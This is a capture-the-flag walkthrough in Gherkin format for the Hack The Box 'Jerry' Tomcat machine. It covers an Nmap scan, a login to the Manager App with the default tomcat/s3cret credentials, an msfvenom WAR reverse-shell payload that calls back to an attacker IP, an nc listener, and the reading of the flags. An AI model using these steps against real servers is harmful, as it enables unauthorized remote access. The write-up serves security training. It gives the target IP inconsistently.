# language: en

Feature:
  TOE:
    HTB Jerry Machine
  Page name:
    Hack The Box
  CWE:
    CWE-521: Weak Password Requirements
  Goal:
    Getting user.txt and root.txt and claiming user and root ownership.
  Recommendation:
    Change default Apache credentials in all users.

  Background:
  Hacker's software:
    |    <name>    |   <version>  |
    | Kali Linux   | 3.30.1       |
    | Firefox ESR  | 60.2.0esr    |
    | Burpsuite CE | 1.7.36       |
    | OpenVPN      | 2.4.6        |
    | metasploit   | 14.17.17-dev |
  TOE information:
    Machine's software:
      |     <name>     |  <version>  |
      | Windows Server | 2012 R2 6.3 |
      | Apache Tomcat  | 7.0.88      |
    Machine's services:
      | <service> | <port> |
      | http      | 8080   |
    Given that I use OpenVPN
    Then I access the machine using the IP 10.10.10.95

  Scenario: Normal use case
    Given I access the IP
    Then I can see the sample Apache servlet config page

  Scenario: Dynamic detection
    The credentials for the manager profile are the default credentials
    assigned by Apache Tomcat.
    Given that I run the following Nmap command:
    """
    nmap -sC -sV -oA nmap/initial 10.10.10.98
    """
    Then I get the output:
    """
    Nmap scan report for 10.10.10.95
    Host is up (0.18s latency).
    Not shown: 999 filtered ports
    PORT   STATE SERVICE VERSION
    8080/tcp open  http  Apache Tomcat/Coyote JSP engine 1.1
    |_http-favicon: Apache Tomcat
    |_http-server-header: Apache-Coyote/1.1
    |_http-title: Apache Tomcat/7.0.88
    """
    Then I access the IP using port 8080 in my browser

  Scenario: Exploitation
    Given that I am located in the index website
    Then I try to access to the Manager App webpage
    But it requests the manager's credentials
    Then I try the default tomcat user
    And the default s3cret password
    And it logs me into the Manager App
    Then I see that there is a module for deploying war files
    Given that I run the following metasploit command:
    """
    msfvenom -p java/shell_reverse_tcp -f war -o develalopez.war
    LHOST=10.10.15.135 LPORT=9001
    """
    Then I get a war that I upload into the application services
    And I execute it from the Manager App
    Then I open port 9001 with the following command:
    """
    nc -nvlp 9001
    """
    And from there I have a command prompt into the machine
    Then I can conclude that I can search for the flags in the directories.

  Scenario: Extraction
    Given that I have access to the machine through a reverse tcp
    Then I access C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt
    And read the file
    Then I can conclude that I succesfully got the user.txt and root.txt flags
    And now I can claim user and root ownership of the machine

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.3/10 (High) - AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.9/10 (High) - E:F/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    8.9/10 (High) - CR:H/IR:H/AR:H

  Scenario: Correlations
    No correlations have been found to this date <18/10/2018>
